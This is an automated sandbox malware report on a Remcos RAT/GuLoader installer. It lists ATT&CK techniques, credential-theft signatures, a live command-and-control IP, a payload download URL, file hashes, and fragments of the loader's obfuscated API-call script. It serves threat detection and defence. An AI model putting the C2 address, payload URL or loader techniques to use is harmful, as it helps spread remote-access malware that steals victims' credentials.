          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 131 Security Software Discovery | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Virtualization/Sandbox Evasion | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 112 Application Layer Protocol | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          Behavior Graph ID: 1520510; Sample: Nutzen_Unterschrift_Planen#...; Startdate: 27/09/2024; Architecture: WINDOWS; Score: 100
          • Sample: DNS/IP geoplugin.net; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 5 other signatures
          • Process Nutzen_Unterschrift_Planen#2024.com.exe (started): dropped C:\Users\user\AppData\Local\...\System.dll, PE32; signatures: Detected unpacking (changes PE section rights); Tries to steal Mail credentials (via file registry); Switches to a custom stack to bypass stack traces
            • Process Nutzen_Unterschrift_Planen#2024.com.exe (started): DNS/IP 66.150.198.142, 2700, 49783, 49784 INTERNAP-BLOCK-4US United States; geoplugin.net 178.237.33.50, 49785, 80 ATOM86-ASATOM86NL Netherlands; signatures: Detected Remcos RAT; Maps a DLL or memory area into another process
              • Process Nutzen_Unterschrift_Planen#2024.com.exe (started): signatures: Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)
              • Process Nutzen_Unterschrift_Planen#2024.com.exe (started): signatures: Tries to steal Mail credentials (via file / registry access)
              • Process Nutzen_Unterschrift_Planen#2024.com.exe (started)

          Source | Detection | Scanner | Label | Link
          Nutzen_Unterschrift_Planen#2024.com.exe | 26% | ReversingLabs | Win32.Trojan.InjectorX |
          Nutzen_Unterschrift_Planen#2024.com.exe | 100% | Joe Sandbox ML | |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dll | 0% | ReversingLabs | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          geoplugin.net | 178.237.33.50 | true | false | | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://geoplugin.net/json.gp | false | | unknown
          66.150.198.142 | true | | unknown
          http://66.150.198.142/lOqpXUmQJccVjyn149.bin | true | | unknown

          Name | Source | Malicious | Antivirus Detection | Reputation
          https://www.google.com | Nutzen_Unterschrift_Planen#2024.com.exe | false | | unknown
          http://www.imvu.comr | Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321711266597.0000000036F40000.00000040.10000000.00040000.00000000.sdmp | false | | unknown
          https://www.msn.com/?ocid=iehp | Nutzen_Unterschrift_Planen#2024.com.exe, 00000003.00000003.316893104356.0000000002421000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
          http://www.imvu.com | Nutzen_Unterschrift_Planen#2024.com.exe | false | | unknown
          https://www.google.com/accounts/servicelogin | Nutzen_Unterschrift_Planen#2024.com.exe | false | | unknown
          https://login.yahoo.com/config/login | Nutzen_Unterschrift_Planen#2024.com.exe | false | | unknown
          https://www.msn.com/de-ch/?ocid=iehp | Nutzen_Unterschrift_Planen#2024.com.exe, 00000003.00000003.316893104356.0000000002421000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
          http://nsis.sf.net/NSIS_ErrorError | Nutzen_Unterschrift_Planen#2024.com.exe, 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Nutzen_Unterschrift_Planen#2024.com.exe, 00000000.00000000.316597134782.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321687991478.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | | unknown
          http://www.nirsoft.net/ | Nutzen_Unterschrift_Planen#2024.com.exe | false | | unknown
          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321711266597.0000000036F40000.00000040.10000000.00040000.00000000.sdmp | false | | unknown
          http://www.ebuddy.com | Nutzen_Unterschrift_Planen#2024.com.exe | false | | unknown

                                        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                        178.237.33.50 | geoplugin.net | Netherlands | | 8455 | ATOM86-ASATOM86NL | false
                                        66.150.198.142 | unknown | United States | | 14742 | INTERNAP-BLOCK-4US | true

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1520510
                                        Start date and time:2024-09-27 12:56:13 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 16m 55s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                        Run name:Suspected Instruction Hammering
                                        Number of analysed new started processes analysed:6
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Sample name:Nutzen_Unterschrift_Planen#2024.com.exe
                                        Detection:MAL
                                        Classification:mal100.phis.troj.spyw.evad.winEXE@9/14@1/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 87%
                                        • Number of executed functions: 163
                                        • Number of non-executed functions: 331
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                        • Exclude process from analysis (whitelisted): dllhost.exe
                                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: Nutzen_Unterschrift_Planen#2024.com.exe

                                        Time | Type | Description
                                        06:59:20 | API Interceptor | 27684660x Sleep call for process: Nutzen_Unterschrift_Planen#2024.com.exe modified

                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                        178.237.33.50 | SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exe | malicious | Remcos | geoplugin.net/json.gp
                                        178.237.33.50 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf | malicious | Remcos | geoplugin.net/json.gp
                                        178.237.33.50 | SecuriteInfo.com.Win32.Evo-gen.3521.549.exe | malicious | Remcos | geoplugin.net/json.gp
                                        178.237.33.50 | sostener.vbs | malicious | Remcos | geoplugin.net/json.gp
                                        178.237.33.50 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
                                        178.237.33.50 | 6122.scr.exe | malicious | Remcos | geoplugin.net/json.gp
                                        178.237.33.50 | 6122.scr.exe | malicious | Remcos | geoplugin.net/json.gp
                                        178.237.33.50 | SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | malicious | Remcos | geoplugin.net/json.gp
                                        178.237.33.50 | https://maveuve.github.io/frlpodf/marynewreleasefax.html | malicious | Remcos | geoplugin.net/json.gp
                                        178.237.33.50 | file.exe | malicious | Remcos | geoplugin.net/json.gp

                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                        geoplugin.net | SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exe | malicious | Remcos | 178.237.33.50
                                        geoplugin.net | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf | malicious | Remcos | 178.237.33.50
                                        geoplugin.net | SecuriteInfo.com.Win32.Evo-gen.3521.549.exe | malicious | Remcos | 178.237.33.50
                                        geoplugin.net | sostener.vbs | malicious | Remcos | 178.237.33.50
                                        geoplugin.net | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | malicious | Remcos, PureLog Stealer | 178.237.33.50
                                        geoplugin.net | 6122.scr.exe | malicious | Remcos | 178.237.33.50
                                        geoplugin.net | 6122.scr.exe | malicious | Remcos | 178.237.33.50
                                        geoplugin.net | SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | malicious | Remcos | 178.237.33.50
                                        geoplugin.net | Marys Organizer 2023 Release.zip | malicious | Remcos | 178.237.33.50
                                        geoplugin.net | https://maveuve.github.io/frlpodf/marynewreleasefax.html | malicious | Remcos | 178.237.33.50

                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                        ATOM86-ASATOM86NL | SERVICE OR PRODUCT DESRIPTION AND COMPANY PROFILE.SCR.exe | malicious | Remcos | 178.237.33.50
                                        ATOM86-ASATOM86NL | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf | malicious | Remcos | 178.237.33.50
                                        ATOM86-ASATOM86NL | SecuriteInfo.com.Win32.Evo-gen.3521.549.exe | malicious | Remcos | 178.237.33.50
                                        ATOM86-ASATOM86NL | sostener.vbs | malicious | Remcos | 178.237.33.50
                                        ATOM86-ASATOM86NL | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | malicious | Remcos, PureLog Stealer | 178.237.33.50
                                        ATOM86-ASATOM86NL | 6122.scr.exe | malicious | Remcos | 178.237.33.50
                                        ATOM86-ASATOM86NL | 6122.scr.exe | malicious | Remcos | 178.237.33.50
                                        ATOM86-ASATOM86NL | SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | malicious | Remcos | 178.237.33.50
                                        ATOM86-ASATOM86NL | Marys Organizer 2023 Release.zip | malicious | Remcos | 178.237.33.50
                                        ATOM86-ASATOM86NL | https://maveuve.github.io/frlpodf/marynewreleasefax.html | malicious | Remcos | 178.237.33.50
                                        INTERNAP-BLOCK-4US | SecuriteInfo.com.Linux.Siggen.9999.14080.25460.elf | malicious | Mirai | 206.191.178.155
                                        INTERNAP-BLOCK-4US | KKveTTgaAAsecNNaaaa.mips.elf | malicious | Unknown | 74.217.127.187
                                        INTERNAP-BLOCK-4US | 77.90.35.9-skid.x86-2024-07-30T07_10_50.elf | malicious | Mirai, Moobot | 69.25.66.63
                                        INTERNAP-BLOCK-4US | 2sjlynRvU1.exe | malicious | GuLoader | 66.150.198.176
                                        INTERNAP-BLOCK-4US | PaymentAdvice_JUL-30-BSSSG01-072024-000218.com.exe | malicious | Remcos, GuLoader | 66.150.198.176
                                        INTERNAP-BLOCK-4US | PaymentAdvice_REMITTANCE-EUR37069-JUL-31-070224-000218.com.exe | malicious | Remcos | 66.150.198.176
                                        INTERNAP-BLOCK-4US | scan_doc20240628154931011588.com.exe | malicious | GuLoader | 66.150.198.176
                                        INTERNAP-BLOCK-4US | 94.156.79.133-mips-2024-07-01T19_26_38.elf | malicious | Mirai, Gafgyt | 206.253.192.109
                                        INTERNAP-BLOCK-4US | g75NqH852l.elf | malicious | Mirai, Moobot | 66.151.233.246
                                        INTERNAP-BLOCK-4US | Q1xJlSm6Vl.elf | malicious | Mirai, Moobot | 75.98.44.199
                                        No context
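
                                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                        C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dll | Benefit_Signature_Plan#3762.com.exe | malicious | Remcos, GuLoader |
                                        C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dll | Benefit_Signature_Plan#3762.com.exe | malicious | GuLoader |
                                        C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dll | DHL SHIPPING DOCUMENTS.exe | malicious | Remcos, GuLoader |
                                        C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dll | DHL SHIPPING DOCUMENTS.exe | malicious | GuLoader |
                                        C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dll | Requesr for quotation-sample catalog.vbs | malicious | FormBook, GuLoader |
                                        C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dll | Requesr for quotation-sample catalog.vbs | malicious | GuLoader |
                                        C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dll | Zahteva za ponudbo #U2013 Katalog vzorcev.vbs | malicious | FormBook, GuLoader |
                                        C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dll | Zahteva za ponudbo #U2013 Katalog vzorcev.vbs | malicious | GuLoader |
                                        C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dll | SecuriteInfo.com.Win32.SuspectCrc.2428.21334.exe | malicious | GuLoader, Snake Keylogger |
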
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):963
                                                          Entropy (8bit):5.007492216176859
                                                          Encrypted:false
                                                          SSDEEP:12:tkW5nd6CsGkMyGWKyGXPVGArwY3NIFa5HEGYArpv/mOAaNO+ao9W7iN5zzkw76kY:qW9dRNuKyGX85ihvXhNlT3/7ucgWro
                                                          MD5:587EEC1777436EC11D208488B9A0E4DD
                                                          SHA1:04A8AB8241918700734AE0D31A7BDF8460A23AAE
                                                          SHA-256:F084AE654930DED55F1C1943BF2B6DA3559D99874F0F8B5D47A1E62EF1D8D676
                                                          SHA-512:2F46655E3333F404BDA9B0D6B0EBB51B25AC3E5B550A11D029E73FD7AE7F0351B8ED7EF33E195C3764CEAC8D2C06ED796A02DB934661F00DDD5623796B500274
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:{. "geoplugin_request":"79.127.132.20",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Ashburn",. "geoplugin_region":"Virginia",. "geoplugin_regionCode":"VA",. "geoplugin_regionName":"Virginia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"511",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"39.0469",. "geoplugin_longitude":"-77.4903",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):45
                                                          Entropy (8bit):4.7748605961854445
                                                          Encrypted:false
                                                          SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                          MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                          SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                          SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                          SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8dbb486c, page size 32768, DirtyShutdown, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):41943040
                                                          Entropy (8bit):1.4125878529581972
                                                          Encrypted:false
                                                          SSDEEP:24576:N+z3CNmtPu9MkoMj7Gyt8mVFPDQgGESg9jokoiGse7rCou2d0lfoBg:7mI9lB7GytBPDQgGwMu2
                                                          MD5:1651D3B37A031B7C1941CFDB78EEDC69
                                                          SHA1:3D22301D718493CC173041DF5C51275AC3419FC7
                                                          SHA-256:36C3B7BBA94CE95A7BEAB9252ABC46211E65CC06D8386CEF0DE6F1ADE85A0755
                                                          SHA-512:E96741D2073EA19A8F4EE686EA719596D904498C5CA3D6FD6A53E91BBC3F4F20FD1EB079485387FE2438FC5DAE5D5383C17C13BAA1CA6E306738E4AE7DFC7DFE
                                                          Malicious:false
                                                          Reputation:low
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11776
                                                          Entropy (8bit):5.659026618805001
                                                          Encrypted:false
                                                          SSDEEP:192:eX24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlqSlS:D8QIl972eXqlWBFSt273YOlqz
                                                          MD5:9625D5B1754BC4FF29281D415D27A0FD
                                                          SHA1:80E85AFC5CCCD4C0A3775EDBB90595A1A59F5CE0
                                                          SHA-256:C2F405D7402F815D0C3FADD9A50F0BBBB1BAB9AA38FE347823478A2587299448
                                                          SHA-512:DCE52B640897C2E8DBFD0A1472D5377FA91FB9CF1AEFF62604D014BCCBE5B56AF1378F173132ABEB0EDD18C225B9F8F5E3D3E72434AED946661E036C779F165B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious
                                                          • Filename: DHL SHIPPING DOCUMENTS.exe, Detection: malicious
                                                          • Filename: Requesr for quotation-sample catalog.vbs, Detection: malicious
                                                          • Filename: Zahteva za ponudbo #U2013 Katalog vzorcev.vbs, Detection: malicious
                                                          • Filename: SecuriteInfo.com.Win32.SuspectCrc.2428.21334.exe, Detection: malicious
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...Y..Y...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):27
                                                          Entropy (8bit):4.134336113194451
                                                          Encrypted:false
                                                          SSDEEP:3:iGAeSMn:lAeZ
                                                          MD5:7AB6006A78C23C5DEC74C202B85A51A4
                                                          SHA1:C0FF9305378BE5EC16A18127C171BB9F04D5C640
                                                          SHA-256:BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
                                                          SHA-512:40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
                                                          Malicious:false
                                                          Preview:[Access]..Setting=Enabled..
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):2
                                                          Entropy (8bit):1.0
                                                          Encrypted:false
                                                          SSDEEP:3:Qn:Qn
                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                          Malicious:false
                                                          Preview:..
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):288114
                                                          Entropy (8bit):1.2434502885411884
                                                          Encrypted:false
                                                          SSDEEP:768:6F9p3t3IrbTwRROFJIPoWbqZKVaCGQUOVKxKEhhKjarIY5LJyyL0bbQUMEQOUI5x:uq2MfCdaCMrG7kLgaRkjpZOzNBK
                                                          MD5:6A1E16CBA1445D499AFE9EB6D8F6BEFC
                                                          SHA1:189C2E83500790659F5BD0D2D7B21823A6D7D93F
                                                          SHA-256:C800DF5007C632E89B1F61A7592F36E967BCAA8C37079C9BBDD2EDBBC5381A61
                                                          SHA-512:81516187AAF31672E2B10183E73A3229FBD638B574E42C9B3ACC2388B4CFBA1F1C7184F9FE69521FA606306004697506A2783E1C98D3B458A18C4EEC8A0694B2
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:ASCII text, with very long lines (377), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):377
                                                          Entropy (8bit):4.247473738841439
                                                          Encrypted:false
                                                          SSDEEP:6:2Vzd6gMnDQ9RF3T/S4AWoPt+1bMd+htV3iRGx4FVw0vYMXJ6KjYFeNgsW9+KT83N:2dsojL6PqbMdeViRGxQPDceNgsEmqBA
                                                          MD5:A057E0CE882029EA5B564143C84FC55A
                                                          SHA1:A86F7916A00CF922E1B01B69212029CF52037407
                                                          SHA-256:C863E9D0414C2E8C1CF7014287D672DDCAEF38CF1ED91278BB9891820044251A
                                                          SHA-512:8D606D6ED91E274AFAE731617751DB4C90334D572AD236F6C0490F6DF0C1CFDC2F17B8BDE97A5DFAFF5B5C04AE7EED9A23053A9A5758CDC1E84A2F786946A79B
                                                          Malicious:false
                                                          Preview:retveindbydendes plade lickety befavor varmeovnens.misprejudiced unreprieved tilgangsreguleringernes lossepladsernes stormpisket borg,taabeligheds marya vestigium rimy resultattavles processtyringer.departmentalization puerperalism afsaltendes valgerd stigningstakters brookier thyreoideal,labret ungkreatur omvej kohrerende bugtedes,designendes sadomasochists beskeler xylyls,
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:GTA audio index data (SDT)
                                                          Category:dropped
                                                          Size (bytes):274165
                                                          Entropy (8bit):7.543392897052076
                                                          Encrypted:false
                                                          SSDEEP:6144:8Xg71tfBj9TJpD37tDWCNSO8l6r9s+n5wQo36CYZn1eqi:8yBRVzXNSOmosAwZ3UZ1eqi
                                                          MD5:C7BF2D747D1DEFECBBF177E8CA8E0A60
                                                          SHA1:A2A56F36391500C40F35B2C806E6DBCCF9034306
                                                          SHA-256:3CAE47C75BBF9311C3966163F767AFD5CE2B73D88CADC5B482487B4DF1074AFA
                                                          SHA-512:FD07DE0A858663BC1A83473AA7D7FD575F95EB8D4B9390B7270C4D2F3B42BB1788F8F46EAABD2441EA16C62330FCDABD1AA3B582F94EAD33B5861EDE0F69F580
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13602
                                                          Entropy (8bit):4.479079605925653
                                                          Encrypted:false
                                                          SSDEEP:192:BKg1zAFz9m8cE1cfe6o9aRAeo/tGTscitMzDmo6FlkBTFlvnb9uWIK5HStmkd3e:EFzg8cE1AeFAAJusBgWlA5tnbQWIwy0
                                                          MD5:172AA18E4C5835ED9B5C81D0E4A1BCCF
                                                          SHA1:1BE5B60F8DC4F7D0A20E9923E76E0F3FE050B4A4
                                                          SHA-256:CDE7CF0875155BB564A50F409D0BE820FA9CCE7C83282A7BAE4A66FA9414B63E
                                                          SHA-512:F9A6E0920622AE8CD164125ABD17EC4245561F5EE0599AEB3922007EACA2CB2AB82EF971B7540CBAD28C7089D7E2C33130EE0A4163BA3AF90B83E0CF49D925E9
                                                          Malicious:false
                                                          Preview:..............i..NN........}..rrrr..........M...................+.................1.f..........k...e...r...n.KKe...l...3...2...:..):...C.PPr...e...a...t...e...F...i.ZZl.y.e..]A...(...m... ...r.. 4... ...,..= ...i... ...0.r.x.KK8...0..*0...0...0...0...0.v.0...,... .d.i... ...0.nn,... ...p... ...0...,... .>.i... .m.4...,... ...i... ...0._.x...8...0...,... .[.i... ..v0...)...i.......r...8...q...k...e...r...n...e...l..63...2..c:...:...S..Re...t...F...i...l.3.e...P...o.3.i..Yn.'.t.a.e...r...(...i.S. ...r...8...,... ..mi... ...2...3...0...1...2... .//,..? ...i... ...0...,...i... ...0...)...i.....NNr...4...q..Rk...e...r...n...e...l...3...2...:..W:...V...i...r...t...u...a...l...A...l...l..oo...c...(...i... ...0...,...i... ...7...3...2...4...8...7...6...8...,... ...i... ...0...x...3...0...0...0...,... ...i... ...0..`x.kk4...0...).K.p.......r...2...q...k...e...r...n..:e...l...3.442...:...:...R...e...a...d...F...i..[l...e...(...i... ..qr..A8...,... ...i... ...r...2...,... ...i... ...7...3...2...4
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):483068
                                                          Entropy (8bit):1.2559621016997755
                                                          Encrypted:false
                                                          SSDEEP:1536:Ts8u8aVK1ZlzjOxDzNWfy52aTmhK55zGW:K8sK1CnI855zj
                                                          MD5:978130B080454EE75826E94EEFAC0DB6
                                                          SHA1:EAAE2B3999D26409C2940341400BBBAB48469E17
                                                          SHA-256:3BBDA07C56DE4470422589DD83FE0A6577965873EFA5C8E5E83FE4F1AA63DCDE
                                                          SHA-512:82495569F36BBDAAD1148F0A690D46FA72473525529F0358DF93F50BE08AC15CFA4FCB80606C42EF8A53C0CCFF4B2D0DAEFA04C58D9C401DF53A82911D91F69E
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):398475
                                                          Entropy (8bit):1.248847086664137
                                                          Encrypted:false
                                                          SSDEEP:768:bkh4Sjk4H7mPNEmlFSqrgoqOZzoC4SaD7V3dMpWrsmTKup6S0HoEoe+gndJDu4u/:+rmPjodMgqouK0WcnEuKSZoP2XkqBO
                                                          MD5:F1CF1E2735A25FA7063AD6B83B19FC89
                                                          SHA1:FE722248A797FE002769CA18A81576296AB22403
                                                          SHA-256:CA79D9C3C8F6BCA1C2312B3B03625465720F77FA069DF8822C001852D8320174
                                                          SHA-512:C1E23B6F6F1C61434BE9B761D2012E3EBDBA7F570A81B014762EA132F5DE2AB99E0951307536640F546AFFC69759C0EFF0F4D0F58771F18EE2F3E2C984FABD95
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):217626
                                                          Entropy (8bit):1.2578603206013297
                                                          Encrypted:false
                                                          SSDEEP:768:XMKYdIEXJwxgkl3KvWaEjMQdp2TWrOr8URnzMazeE3hLOPf9BYgTtTkYCkkpMkNx:FlaopMDh0BmrkYin5Q
                                                          MD5:3F90DDDD63AE098601831A6E980C14A0
                                                          SHA1:4886FAB60F9408EA1A4AEB3ECD0DDFF3EE5CB6E4
                                                          SHA-256:AC86AC0C331BD0885EFF6138AA0BFCBA447DCC32BF53C764A3B350A24C121C27
                                                          SHA-512:54A5A11ACF41B7E0F8AD0765637FC9A0F376C61CA3630820F6C80424BC6B849999677EBA2046BCC2586A5081CA26E8C01338306E0E3D55CBAB9FD8A8830D07FA
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          File Type:Matlab v4 mat-file (little endian) , numeric, rows 10092776, columns 0
                                                          Category:dropped
                                                          Size (bytes):424413
                                                          Entropy (8bit):1.2492169177560173
                                                          Encrypted:false
                                                          SSDEEP:768:7Gx4c5hFkUmQbJLYe2jSB5rZDPdg2xnkwzIGn59Yrg/VhmvCQyjVjCC51kotL6PX:m59NMhxMJVZWiEeZnw/2zso55+EhOt
                                                          MD5:3DF6AD4FBABFD56702AF1CF7EBA6B9CB
                                                          SHA1:B473DD3797EC446C80EBAFC30F749939D1BAE334
                                                          SHA-256:08539C762BBA9CAED2AD7EA548ED678763ECFC8C4A2162658301CA7D5E17E24F
                                                          SHA-512:D7FA42CC6C6C8F49E74BD0A42B393BD23434601444C99C7F42F2D9AE59701ACFB9FB5F8700638A1C6B931810DB93823C7734393221E854881349D93DD44F30E7
                                                          Malicious:false
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Entropy (8bit):7.521658981788193
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
